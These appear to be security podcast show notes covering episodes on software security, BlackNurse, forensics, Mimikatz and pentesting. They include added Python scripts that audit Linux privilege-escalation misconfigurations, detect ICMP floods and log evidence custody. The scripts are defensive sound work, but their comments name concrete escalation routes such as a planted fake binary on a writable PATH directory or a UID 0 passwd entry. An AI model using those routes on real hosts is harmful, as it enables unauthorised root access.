iTunes: https://itunes.apple.com/us/podcast/2016-048-dr.-gary-mcgraw-building/id799131292?i=1000378548363&mt=2
YouTube: https://www.youtube.com/watch?v=x65yL5_Hpi4
Just a quick episode this week...
As part of the Brakesec Book Club (join us on our #Slack Channel for more information!) we are discussing Dr. Gary McGraw's book "Software Security: Building Security In" (Amazon Link: https://is.gd/QtHQcM)
We talk about the need to insert security into your company's #SDLC... but what exactly can be done to enable that? Abuse cases, #risk #analysis, creating security test cases, pentesting, and #security #operations are all methods to do so.
Finally, I discovered a blog post about ways to discover configuration errors on Linux systems that might allow #privilege #escalation to occur. Using these tools as part of your hardening process could lower the risk of a bad actor gaining elevated privileges on your Unix-like hosts.
http://rajhackingarticles.blogspot.com/2016/11/4-ways-to-get-linux-privilege-escalation.html
You can find the github of this script and the audit software that I mentioned below:
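As an added example (not the script or audit software the show refers to, and not the blog's code), here is a small Python audit for four of the classic Linux misconfigurations that lead to privilege escalation: setuid/setgid binaries, world-writable directories on PATH, NOPASSWD sudo rules, and sensitive files such as /etc/passwd that the current user can write to. Paths and the sudoers text are parameters so the checks can be pointed at a test tree; run with no arguments it audits the live host. The sudoers sample in the comments is constructed.

```python
"""Audit a Linux host for common misconfigurations that enable privilege escalation.

Added example for these show notes (not the script or audit software the show
mentions). Run as root for a complete picture; as an unprivileged user it still
finds what that user could abuse.
"""
import os
import stat
import sys

DEFAULT_SENSITIVE = ("/etc/passwd", "/etc/shadow", "/etc/sudoers", "/etc/crontab")


def is_setuid_or_setgid(mode):
    """True if a file mode has the setuid or setgid bit (what `find -perm /6000` matches)."""
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))


def suid_files(root):
    """Walk `root` and return regular files with setuid/setgid set.

    Every such binary runs with its owner's privileges; anything outside the
    distro's known list (sudo, passwd, ping, ...) deserves a look."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and is_setuid_or_setgid(st.st_mode):
                hits.append(path)
    return sorted(hits)


def world_writable_dirs(path_entries):
    """Directories on PATH that anyone can write to and that lack the sticky bit.

    A root cron job or script that calls `tar` by bare name will happily run a
    fake `tar` dropped into such a directory."""
    bad = []
    for d in path_entries:
        try:
            st = os.stat(d)
        except OSError:
            continue  # missing PATH entries are a separate (hijack) finding
        if not stat.S_ISDIR(st.st_mode):
            continue
        if st.st_mode & stat.S_IWOTH and not st.st_mode & stat.S_ISVTX:
            bad.append(d)
    return bad


def nopasswd_sudoers(text):
    """Return the principals (user or %group) granted NOPASSWD in sudoers text,
    e.g. the constructed line 'bob ALL=(ALL) NOPASSWD: ALL' yields 'bob'."""
    principals = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        if "NOPASSWD:" in line:
            principals.append(line.split()[0])
    return principals


def writable_by_current_user(paths):
    """Sensitive files the current user could modify (e.g. add a UID 0 user to passwd)."""
    return [p for p in paths if os.path.exists(p) and os.access(p, os.W_OK)]


def audit(root="/", path_env=None, sudoers_path="/etc/sudoers", sensitive=DEFAULT_SENSITIVE):
    """Run all checks and return a dict of findings (empty lists mean nothing found)."""
    if path_env is None:
        path_env = os.environ.get("PATH", "")
    try:
        with open(sudoers_path) as f:
            sudoers_text = f.read()
    except OSError:
        sudoers_text = ""  # unreadable as non-root; rerun as root to check
    return {
        "suid_sgid": suid_files(root),
        "world_writable_path_dirs": world_writable_dirs(path_env.split(os.pathsep)),
        "nopasswd_sudo": nopasswd_sudoers(sudoers_text),
        "writable_sensitive": writable_by_current_user(sensitive),
    }


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for check, findings in audit(root).items():
        print(f"{check}: {findings if findings else 'none'}")
```

Findings are a starting point, not a verdict: a setuid binary that ships with the distro is expected, while one in /opt or /home is not, and an empty `nopasswd_sudo` list from an unprivileged run only means /etc/sudoers was unreadable.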
Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast
Published on: November 28, 2016
This week, Mr. Boettcher found himself with an interesting conundrum concerning what happened when he converted a Windows DOCX file to a PDF using a popular #PDF converter. We discuss what happened, how Software Restriction Policy in Windows kept him safe from a potential malware infection, and the logging that occurred.
After that, we discuss some recent vulnerabilities, like the BlackNurse resource exhaustion attack, and how you can protect your infrastructure from a denial of service caused by someone sending your firewall 300 ICMP packets a second... which anyone can do.
We discuss Robert Graham's recent run-in with a new surveillance camera and how it was pwned in less time than you think. And learn about the 'buenoware' that has been released that 'patches' IoT and embedded devices... But does it do more harm than good, and is it legal?
All that and more this week on Brakeing Down Security Podcast!
Check out our official #Slack Channel! Sign up at https://brakesec.signup.team
Next Book Club session is 29 November 2016. Our current book for study is 'Software Security: Building Security In' by Dr. Gary McGraw https://www.amazon.com/Software-Security-Building-Gary-McGraw/dp/0321356705 (the ebook is available on Safari Books Online)
BlackNurse
https://nakedsecurity.sophos.com/2016/11/17/blacknurse-revisited-what-you-need-to-know/
http://researchcenter.paloaltonetworks.com/2016/11/note-customers-regarding-blacknurse-report/
http://www.netresec.com/?page=Blog&month=2016-11&post=BlackNurse-Denial-of-Service-Attack
Recent tweet from @boettcherpwned about an infected DOCX with macros; we discuss why Foxit PDF runs the macros and open_document:
https://twitter.com/boettcherpwned/status/799726266693713920
Rob Graham (@ErrataRob): new camera pwned by the #Mirai botnet and others within 5 minutes:
https://twitter.com/newsyc200/status/799761390915424261
ICMP Type 3, Code 3 (Destination Unreachable: Port Unreachable), RFC 792: http://www.faqs.org/rfcs/rfc792.html
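To make the BlackNurse discussion concrete, here is an added example (not code from the show, the linked articles, or any vendor) that detects the attack pattern in a packet feed: a per-source sliding-window count of ICMP Type 3 Code 3 packets. The packet records are constructed inline (timestamps, source IPs from documentation ranges, ICMP type/code) to stand in for what you would pull from a pcap or firewall log; the 100 packets-per-second threshold is an assumption, so tune it to your own baseline. It also encodes the filtering caveat a practitioner wants: rate-limit Type 3 Code 3, but never drop Type 3 Code 4 (Fragmentation Needed) wholesale, or you break path MTU discovery.

```python
"""Detect a BlackNurse-style ICMP Type 3 Code 3 flood and decide what to filter.

Added example for these show notes; not code from the show or the linked
reports. Input is a list of (timestamp_seconds, src_ip, icmp_type, icmp_code).
"""
from collections import defaultdict, deque

ICMP_DEST_UNREACH = 3
CODE_PORT_UNREACH = 3   # the BlackNurse packet
CODE_FRAG_NEEDED = 4    # needed for path MTU discovery; never drop it wholesale
ICMP_ECHO_REQUEST = 8


def is_blacknurse_packet(icmp_type, icmp_code):
    return icmp_type == ICMP_DEST_UNREACH and icmp_code == CODE_PORT_UNREACH


def find_floods(packets, pps_threshold=100, window=1.0):
    """Return {src_ip: peak packets-per-window} for sources whose Type 3 Code 3
    rate reached pps_threshold inside any sliding window of `window` seconds."""
    recent = defaultdict(deque)   # src -> timestamps of its Type 3/3 packets in the window
    peak = {}
    for ts, src, icmp_type, icmp_code in sorted(packets):
        if not is_blacknurse_packet(icmp_type, icmp_code):
            continue
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] >= window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > peak.get(src, 0):
            peak[src] = len(q)
    return {src: n for src, n in peak.items() if n >= pps_threshold}


def filter_decision(icmp_type, icmp_code):
    """Policy for a border device: rate-limit the abused message, keep PMTUD working."""
    if icmp_type == ICMP_DEST_UNREACH:
        if icmp_code == CODE_FRAG_NEEDED:
            return "allow"         # dropping this silently breaks large transfers
        return "rate-limit"        # Type 3 Code 3 and the other unreachable codes
    return "allow"


def constructed_sample():
    """Synthetic capture: one attacker at 400 pps of Type 3/3 for one second,
    one normal host that returns a handful of port-unreachables, plus some pings."""
    attacker, normal = "203.0.113.9", "198.51.100.7"
    pkts = [(i / 400.0, attacker, ICMP_DEST_UNREACH, CODE_PORT_UNREACH) for i in range(400)]
    pkts += [(float(i), normal, ICMP_DEST_UNREACH, CODE_PORT_UNREACH) for i in range(5)]
    pkts += [(0.5 + i, attacker, ICMP_ECHO_REQUEST, 0) for i in range(3)]  # ignored by the detector
    return pkts


if __name__ == "__main__":
    for src, rate in find_floods(constructed_sample()).items():
        print(f"possible BlackNurse flood from {src}: peak {rate} Type 3 Code 3 packets/s")
    print("Type 3 Code 4:", filter_decision(3, 4), "| Type 3 Code 3:", filter_decision(3, 3))
```

The detector counts per source because a single host is enough for this attack; if your firewall's CPU is the bottleneck, the number that matters is the aggregate Type 3 Code 3 rate across all sources, which is the sum of the per-source queues at any instant.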
#SHA1 website certificates no longer trusted by Chrome beginning in January 2017 (Chrome 56)
#Benevolent #malware (buenoware)
https://isc.sans.edu/diary/Benevolent+malware%3F+reincarnaLinux.Wifatch/21703
#Atombombing
http://blog.ensilo.com/atombombing-a-code-injection-that-bypasses-current-security-solutions
https://breakingmalware.com/injection-techniques/atombombing-cfg-protected-processes/
http://www.pandasecurity.com/mediacenter/malware/atombombing-windows-cybersecurity/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-046-Black_Nurse_buenoware_IoT_pwnage.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-046-blacknurse-buenoware/id799131292?i=1000378076060&mt=2
Youtube: https://www.youtube.com/watch?v=w-FEJuWGXaQ
During a security incident, or in the course of an investigation, it may become necessary to gather evidence for use in a possible future court case. But if you don't have $4,000-10,000 USD for fancy forensic software, you'll need other methods to preserve the data, establish its integrity (hashes taken at acquisition and re-checked later), and keep a proper chain-of-custody record showing who handled the data, how it was collected, when, and so on.
This podcast was not meant to turn you into an expert, but instead to go over the finer points of the process, and even where you should turn if you need help.
Certified Ethical Hacker book I was referencing in the show: http://www.wiley.com/WileyCDA/WileyTitle/productCd-1119252245,miniSiteCd-SYBEX.html
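The mechanics the episode describes (hash at acquisition, verify later, keep a custody record) fit in a short script. The following is an added example, not the show's or any vendor's forensic tool: SHA-256 of the evidence file, a JSON-lines custody log where each entry carries the hash of the previous entry (a hash chain, so a later edit to any earlier entry is detectable), and verification steps for both. File names, handler names and the log format are assumptions for illustration. Hash-chaining only protects entries that have a successor, so the `log_head` value should be copied somewhere the log cannot be rewritten, such as the signed paper custody form.

```python
"""Evidence integrity and chain of custody without commercial forensic tooling.

Added example for these show notes (not the show's or any vendor's tool).
Hashes the evidence, keeps a hash-chained JSON-lines custody log, and verifies both.
"""
import hashlib
import json
import os
from datetime import datetime, timezone

GENESIS = "0" * 64        # 'prev' value for the first entry in a log
CHUNK = 1 << 20


def sha256_file(path):
    """Stream the file so multi-GB disk images do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def entry_hash(entry):
    """Canonical hash of one log entry (sorted keys, so the encoding is deterministic)."""
    return hashlib.sha256(json.dumps(entry, sort_keys=True).encode()).hexdigest()


def read_log(log_path):
    if not os.path.exists(log_path):
        return []
    with open(log_path) as f:
        return [json.loads(line) for line in f if line.strip()]


def record_custody(log_path, evidence_path, handler, action, note=""):
    """Append one custody event; each entry commits to the previous entry's hash."""
    entries = read_log(log_path)
    entry = {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "evidence": os.path.basename(evidence_path),
        "sha256": sha256_file(evidence_path),   # re-hashed at every hand-off
        "handler": handler,
        "action": action,
        "note": note,
        "prev": entry_hash(entries[-1]) if entries else GENESIS,
    }
    with open(log_path, "a") as f:
        f.write(json.dumps(entry, sort_keys=True) + "\n")
    return entry


def verify_log_chain(log_path):
    """True if no entry has been altered or removed (except possibly the last one)."""
    prev = GENESIS
    for entry in read_log(log_path):
        if entry.get("prev") != prev:
            return False
        prev = entry_hash(entry)
    return True


def log_head(log_path):
    """Hash of the latest entry: record it out of band (paper form, ticket) to anchor the chain."""
    entries = read_log(log_path)
    return entry_hash(entries[-1]) if entries else GENESIS


def verify_evidence(log_path, evidence_path):
    """True if the file still matches the hash taken when it was first logged (acquisition)."""
    name = os.path.basename(evidence_path)
    entries = [e for e in read_log(log_path) if e.get("evidence") == name]
    if not entries:
        return False
    return sha256_file(evidence_path) == entries[0]["sha256"]


if __name__ == "__main__":
    import sys
    # usage: custody.py custody.jsonl disk.img "B. Brake" acquired
    log, evidence, handler, action = sys.argv[1:5]
    record_custody(log, evidence, handler, action)
    print("evidence ok:", verify_evidence(log, evidence),
          "| log chain ok:", verify_log_chain(log), "| head:", log_head(log))
```

Keep the original evidence read-only (or work from a verified copy) once the acquisition hash is recorded; `verify_evidence` deliberately compares against the first entry, so any later hand-off that changed the bytes shows up as a failure rather than being silently accepted.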
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-044-Evidence_chain_of_custody_data_integrity.mp3
#YouTube: https://www.youtube.com/watch?v=aJA2ry6npKI
#iTunes: https://itunes.apple.com/us/podcast/2016-044-chain-custody-data/id799131292?i=1000377566298&mt=2
Published on: November 7, 2016
**Brakeing Down Security has a Slack channel now... just go to https://brakesec.signup.team and follow the instructions to have the bot add you to our show's official channel.**
Every year, organizations come out with industry reports that show how well or, more often than not, how poorly we are doing.
We always enjoy reviewing the BSIMM (Building Security In Maturity Model) report, because it's an unvarnished, good measure of a good number of industry verticals, like finance, manufacturing, cloud, and even companies that make IoT devices.
Join Mr. Boettcher and me this week as we go over the findings of the BSIMM7 report, discuss what got better, what still sucks, and what we shouldn't fault companies for not having.
We also have a teachable moment when I discuss a security faux pas that happened to me (Bryan) recently regarding an email account and my Skype. Two-factor authentication is your friend, and if it's available, use it.
Mr. Boettcher discusses some recent malware that has reared its ugly head, and how to detect it.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-043-BSIMMv7.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-043-bsimmv7-teachable/id799131292?i=1000377394890&mt=2
YouTube: https://www.youtube.com/watch?v=I3FLSLSSb_Y
Published on: November 1, 2016
Join us for a special episode this week! I (Bryan) was able to attend my first Source Seattle convention. Two days of talks, technical and non-technical, combining red/blue team concepts, as well as professional development, to help you navigate the corporate waters easier.
I was able to interview a number of people from the conference. You can see a partial list of them here:
http://www.sourceconference.com/single-post/2016/09/30/SOURCE-Seattle-Highlights
Interviewed
Chip McSweeney from OpenDNS (@chipmcmalware) and Rob Cheyne, about the conference; I also got a bit of information about Chip's talk on "Domain Generating Algorithms" (DGA) that #malware use for C&C domains, and how to detect and reverse certain algorithms.
Rob Cheyne is the organizer of Source, so we talked a bit about the history and the difficulties of putting on three of these a year, and what makes the "Source" conference format so different.
Masha Sedova was one of the keynote speakers; we discuss how she gamified her information security program and got everyone involved. Really excellent talk about changing organizational behavior.
Rob Fuller gave two days of Metasploit training, to show the versatility and to teach about the effectiveness of this tool. I also ask if Metasploit has reached its end, since it's easily detected in many environments. Rob is a great interview and gives me his unvarnished opinion.
Mike Shema from https://cobalt.io/ discussed expanding and tailoring your bug bounty program to suit your organization and to ensure that it is mature. Using private bug bounties, and ensuring proper follow-through in a timely manner, can ensure maximum bang for the buck.
Last but not least, Deidre Diamond, who gave a keynote about 'Words to Stop Using Now'. Deidre is the CEO of a national cyber security staffing company (Cyber Security Network) and founder of a not-for-profit that empowers women in the infosec industry. Hear her thoughts on why leadership training is needed in the corporate environment; I ask her why we still need recruiters when we have hiring sites, and why job descriptions are still a thorn in everyone's side.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-042-Source_Seattle_2016_audio.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-042-audio-from-source/id799131292?i=1000377063127&mt=2
YouTube: https://www.youtube.com/watch?v=sj_SD2k7zXw
Published on: October 24, 2016
Ben Johnson has been around the industry for a good while, and has seen a lot of ugly things.
Ben wrote a recent blog post (https://www.carbonblack.com/2016/08/12/benvlog-3-negative-forces-driving-security/) detailing the issues that seem to plague many companies and many people in the infosec community.
We talked about these issues in depth, how companies and even the employees in a company can ease some of their burdens, and what changes they can make to improve company culture.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-041-Ben_johnson.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-041-ben-johnson-company/id799131292?i=1000376744922&mt=2
YouTube: https://www.youtube.com/watch?v=HrTPH97-YIY
Published on: October 17, 2016
If you work in a #DevOps environment, you're on one side of the fence... either you're with the devs, you have freedom to make changes, and everything is great.
Or you're on the Security and/or Compliance side, and it's a desolate wasteland of watching people play fast and loose with policies, no one documenting anything, and you're seen as a 'barrier' to getting the new hotness out.
But does it have to be that way? This week, we sat down with DevOps veterans Gene Kim and Josh Corman to discuss how we can get security, compliance, and DevOps to play nice with one another.
Gene Kim's new book (excerpt): http://itrevolution.com/handbook-excerpt
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-040-Gene_Kim-Josh_Corman-Getting_Security-and_DevOps_playing_nice.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-040-gene-kim-josh-corman/id799131292?i=1000376417012&mt=2
YouTube: https://www.youtube.com/watch?v=fOuSRYJtiKo
Published on: October 10, 2016
Join us this week as Robert Hurlbut (@roberthurlbut on Twitter), an independent consultant with over 25 years of application development experience, helps us understand the best methods for getting developers on the same level as security professionals when it comes to application security flaws.
We also discuss some of the soft skills involved in bringing new concepts to organizations, like teaching proper coding conventions, changing up the development lifecycle, and helping to improve the skills of developers and managers.
Robert's Website is chock full of good information about threat modeling and secure coding practices at http://www.roberthurlbut.com
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-039-Robert_Hurlbut-threat_modeling_and_analysis.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-039-robert-hurlbut-threat/id799131292?i=1000376171899&mt=2
YouTube: https://www.youtube.com/watch?v=P5jEVJTymOg
Published on: October 4, 2016
Mr. Brian Boettcher and I had a great time at DerbyCon. We met so many people, and it really was excellent meeting all the fans who came up and said "Hello" or told us they really enjoyed the #podcast. It is truly a labor of love and something that we hope everyone can learn something from.
We got some audio while at lunch at #Gordon #Biersch with Mr. Brian Boettcher and Michael Gough, talking about log monitoring, inspired by @dualcore's #Anti-Forensics talk (http://www.irongeek.com/i.php?page=videos/derbycon6/310-anti-forensics-af-int0x80-of-dual-core), and how attackers evade log monitoring. (shout-out to @mattifestation, @dualcore, @baywolf88, @carlos_perez)
We sat down with Mr. Osman (@surkatty) from the Sound Security Podcast (@SoundSec), who was a first time attendee to #DerbyCon. We get his thoughts about DerbyCon and what talks he enjoyed.
Finally, our 2nd Annual podcast with our fellow podcasters was on. We had it in Bill Gardner's room (ReBoot-It podcast) (@oncee), Amanda Berlin (@infosystir) from #Hurricane #Labs Podcast, Jerry Bell (@MaliciousLink) from #Defensive #Security Podcast, Ben Heise (@benheise) from Rally #Security Podcast, Tim DeBlock (@TimothyDeBlock) from Exploring Information Security Podcast, and SciaticNerd (@sciaticnerd) from Security Endeavors podcast
IronGeek's website has all the videos available to listen to here: http://www.irongeek.com/i.php?page=videos/derbycon6/mainlist
Whiskey Bent Valley Boys: http://whiskeybentvalley.tumblr.com/ or iTunes: https://itunes.apple.com/us/artist/whiskey-bent-valley-boys/id318874442
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-038-Derbycon_podcast.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-038-derbycon-audio-2nd/id799131292?i=1000375934157&mt=2
YouTube: https://www.youtube.com/watch?v=W7ylsfwGyhc
Published on: September 28, 2016
Have you ever found a #vulnerability and wondered if it was worth the time and effort to reach back to the company in question to get the fix in?
This week, we have a story from Mr. "B1ack0wl", who found a vulnerability in certain #Belkin #embedded network devices for end users... We also find out how B1ack0wl learned his stock in trade.
https://www.exploit-db.com/exploits/40332/
Find out how he discovered it, what steps he took to disclose it, and what ended up happening to the finding.
http://www.devttys0.com/ -- #embedded device hacking blog
http://io.netgarage.org/ -- #wargame site #B1ack0wl mentioned
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-037-b1ack0wl_responsible_disclosure-belkin_routers.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-037-b1ack0wl-responsible/id799131292?i=1000375462991&mt=2
YouTube: https://www.youtube.com/attribution_link?a=kChiecG0Sv4&u=/watch%3Fv%3D9_qS2s3GrT4%26feature%3Dem-upload_owner
Published on: September 14, 2016
Nick Selby (@nselby on Twitter) is an independent consultant who works a wide variety of jobs. During a recent engagement, he ran into an interesting issue after a company called him in to handle an incident response. The issue wasn't with the client; it was with the client's Managed Security Service Provider (#MSSP). His blog post about the incident made big news on Twitter and elsewhere.
Nick's Blog Post: https://nselby.github.io/When-Security-Monitoring-Provides-Neither-Security-Nor-Monitoring/
So, we wanted to have Nick on to discuss any updates that have occurred, and we also asked an MSSP owner, Kevin Johnson from SecureIdeas (@secureideas on Twitter), to join, since Kevin is well versed in both sides, having been a customer and now running an MSSP with his product, Scout (https://secureideas.com/scout/index.php).
We go over what an MSSP is (or what each person believes an MSSP is), we discuss the facts from Nick's and his client's side, we try to put ourselves in the shoes of the MSSP, and we ask whether they handled the issue properly.
We also find out how Nick managed to save the day, and the tools they used to solve the problem. We did a whole podcast on that subject once, and maybe it's time to revisit it...
Finally, we discuss the relationship between an MSSP and the customer, what expectations each party should have of the other, and what the real questions are that each should ask when you're searching out an MSSP.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-036-mssp-nick_selby-kevin_johnson.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-036-mssp-pitfalls-nick/id799131292?i=1000375157370&mt=2
YouTube: https://www.youtube.com/watch?v=b1rEpaBAKpQ
Published on: September 11, 2016
Paul Coggin is my SME when I need to know about anything network #security related. This time, we wanted to have him on our show to discuss Software Defined Networking (#SDN).
Software defined networking allows applications to make connections, manage devices, and even control the network using #APIs. In effect, it allows any developer to become a network engineer. Obviously, this could be a recipe for disaster if the dev does not fully understand the ramifications.
And there's more good news (if you're a black hat): there's no role-based security, parts of the #specification aren't fully fleshed out yet, and vendors have their own frameworks that may not be fully interoperable with each other...
Paul talks to us about some background of #SDN, some of the pitfalls and what you need to think about when implementing Software Defined Networking.
Links referred to in the Show:
https://www.rsaconference.com/writable/presentations/file_upload/tech-r03-sdn-security-v3.pdf
https://www.blackhat.com/docs/eu-14/materials/eu-14-Pickett-Abusing-Software-Defined-Networks-wp.pdf
http://onosproject.org/2015/04/03/sdn-and-security-david-jorm/
https://people.eecs.berkeley.edu/~rishabhp/publications/Sphinx.pdf
https://www.opennetworking.org/certification
Ras Pi as an OpenFlow controller: https://faucet-sdn.blogspot.com/2016/06/raucet-raspberry-pi-faucet-controlling.html
Zodiac FX SDN boards (Excellent customer service!): http://northboundnetworks.com/
Excellent site discussing SDN: http://www.ipspace.net/Main_Page
Coursera SDN course: https://www.coursera.org/learn/sdn
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-035-Paul_Coggin_SDN.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-035-paul-coggin-discusses/id799131292?i=1000374972931&mt=2
YouTube: https://www.youtube.com/watch?v=YuuNzeiexUY
Published on: September 6, 2016
Another great #rejectedTalk we found was from Sean Malone (@seantmalone on Twitter). The Cyber Kill Chain is a model by which we explain the methodology of attackers and the phases of an intrusion.
In this discussion, we find Sean has expanded the #killchain to be more granular, and to show the decision tree an attacker works through once they've gained access to hosts.
This expanded #killChain is also effective for understanding when #hackers are attacking specific systems, like #SCADA, or other specialized systems or networks, like #SWIFT banking transfers. This discussion is also great for showing management the time and effort required to gain access to systems.
We also talk about the #OODA loop (https://en.wikipedia.org/wiki/OODA_loop) and how disrupting that will often cause attacks to go awry or to be stunted, reducing the effectiveness.
Sean T. Malone website: http://www.seantmalone.com/
Slides and presentation referred to in the podcast: http://www.seantmalone.com/docs/us-16-Malone-Using-an-Expanded-Cyber-Kill-Chain-Model-to-Increase-Attack-Resiliency.pdf
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-034-CyberKillChain.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-034-sean-malone-from/id799131292?i=1000374642630&mt=2
YouTube: https://www.youtube.com/watch?v=eBOCjaGmbMg
Published on: August 28, 2016
Bill V. (@blueteamer on Twitter) was the 1st in a series we like to call "2nd Chances: Rejected Talks". Bill had a talk that was initially rejected at DerbyCon (it was later accepted after someone else cancelled). Here is the synopsis of his talk, which you can now see at DerbyCon:
Privileged Access Workstations (PAWs) are hardened admin workstations implemented to protect privileged accounts. In this talk I will discuss my lessons learned while deploying PAWs in the real world as well as other techniques I've used to limit exposure to credential theft and lateral movement. I hope to show fellow blue teamers these types of controls are feasible to implement, even in small environments.
TechNet article referenced on the show:
https://technet.microsoft.com/en-us/windows-server-docs/security/securing-privileged-access/privileged-access-workstations
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-033-PAWs-Bill_Voecks-Rejected_Talks.mp3
RSS: http://www.brakeingsecurity.com/rss
iTunes: https://itunes.apple.com/us/podcast/2016-033-privileged-access/id799131292?i=1000374432509&mt=2
YouTube: https://www.youtube.com/watch?v=0DwR9RcEBo0
Published on: August 22, 2016
Co-host Brian Boettcher went to Black Hat and DEF CON this year, as an attendee of the respective cons, but also as a presenter at "Arsenal", which is a venue designed to showcase up-and-coming software and hardware tools. We started off by asking him about his experiences at Arsenal, and how he felt about "Hacker Summer Camp".
Our second item was the recent Brakesec Podcast CTF we held to give away a free ticket to DerbyCon. We discussed some pitfalls we ran into, how we'll prepare for the contest next year, and the steps it took to solve the challenges.
The final item of the night was travel security, since the Olympics are on and there was a report about Olympic athletes who were robbed at gunpoint. We discuss safety while traveling, keeping a low profile, reducing risk, and reminding you to leave the overly patriotic shirts and apparel at home.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-032-Defcon-blackHat_debrief-travel-security_CTF-writeup-final.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-032-blackhat-defcon-debrief/id799131292?i=1000374155086&mt=2
YouTube: https://www.youtube.com/watch?v=Df-JL-PiGus
Published on: August 15, 2016
A couple of weeks ago, we discussed on our show that not all incident response events require digital forensics. We got quite a bit of feedback about that episode, so in an effort to address the feedback, we brought Brian Ventura on.
Brian has 20+ years in Information Technology, ranging from systems administration to project management and information security. He is an Information Security Architect in Portland, Oregon and volunteers as the Director of Education for the Portland ISSA Chapter. Brian holds his CISSP and GCCC, as well as other industry certifications. As the Director of Education, Brian coordinates relevant local and online training opportunities.
We discuss definitions of what digital forensics is, and how broad a range of activities that term really covers.
Brian will be teaching SEC566 in Long Beach in September. Here is the link for more information to sign up for this course... https://www.sans.org/community/event/sec566-long-beach-26sep2016-brian-ventura
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-031-DFIR_discussion_and_rebuttal.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-031-dfir-rebuttal-handling/id799131292?i=1000373849931&mt=2
YouTube: https://www.youtube.com/watch?v=e3Dy001GdWM
Published on: August 8, 2016
In the last few years, security researchers and attackers have found an easy way of obtaining passwords without having to dump and crack Windows password hashes.
When Windows is improperly configured, credentials are kept in memory, often in plain text, where they can be read by tools such as Mimikatz.
This week, we discuss Mimikatz, and the methods by which you can protect your environment by hardening Windows against such attacks.
Links to blogs:
https://www.praetorian.com/blog/mitigating-mimikatz-wdigest-cleartext-credential-theft
http://blog.gojhonny.com/2015/08/preventing-credcrack-mimikatz-pass-hash.html
https://jimshaver.net/2016/02/14/defending-against-mimikatz/
Praetorian Report on pentests: http://www3.praetorian.com/how-to-dramatically-improve-corporate-IT-security-without-spending-millions-report.html
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-030-Defense_against_Mimikatz.mp3
YouTube: https://www.youtube.com/watch?v=QueSEroKR00
iTunes: https://itunes.apple.com/us/podcast/2016-030-defending-against/id799131292?i=1000373511591&mt=2
Published on: July 31, 2016
Jarrod Frates (@jarrodfrates on Twitter) has been doing pentests as a red-team member for a long time. His recent position at #InGuardians sees him engaging many companies who have realized that a typical 'pentest #puppymill' or pentest from certain companies just isn't good enough.
Jarrod has also gone on more than a few engagements where he has found the client in question has no clue of what a 'real' pentest is, and worse, they often have the wrong idea of how it should go.
This week, I sat down with Jarrod, and we talked about what needs to occur before the pentest, even before you contact the pentesting firm... even, in fact, before you should consider a pentest at all.
We discuss what a pentest is, and how it's different from a 'vulnerability assessment' or a code audit. Jarrod and I discuss the overarching requirements of the pentest (are you doing it 'just because', or do you need to check a box for compliance?). We ask questions like:
Who should be involved setting scope?
Should #Social #Engineering always be a part of a pentest?
Who should be notified if/when a #pentest is to occur?
Should your SOC be told when one occurs?
What happens if the pentest causes incident response to be called (like if someone finds a malware/botnet infection)?
And how long do you want the engagement to be?
And depending on the politics involved, these things can affect the quality of the pentest, and the cost as well...
It was a great discussion with Jarrod, a seasoned professional, and veteran of many engagements. If your organization is about to engage a company for a pentest, you'd be wise to take a moment and listen to this.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-029-Jarrod_Frates-What_to_do_before_a_pentest_starts.mp3
#iTunes: https://itunes.apple.com/us/podcast/2016-029-jarrod-frates-steps/id799131292?i=1000373091447&mt=2
#YouTube: http://www.youtube.com/attribution_link?a=p2oq6jT3Iy0&u=/watch%3Fv%3DsTc_seN-hbs%26feature%3Dem-upload_owner
Published on: July 25, 2016
Long time listeners will remember Ms. Cheryl #Biswas as one of the triumvirate we had on to discuss #mainframes and mainframe #security. (http://traffic.libsyn.com/brakeingsecurity/2016-008-mainframe_secruity.mp3)
I was interested in the goings-on at BlackHat/DefCon/BsidesLV, and heard about #TiaraCon (@tiarac0n on Twitter). I went to find someone involved to understand what it was all about, and Ms. Cheryl reached out. She's an #organizer and was more than happy to sit down with me to explain why it was started. This is its inaugural year, and they already have some excellent schwag and sponsors. This is not just an event for ladies, but a way of #empowering #women, creating #mentorship opportunities, and assisting people moving into the #infosec industry.
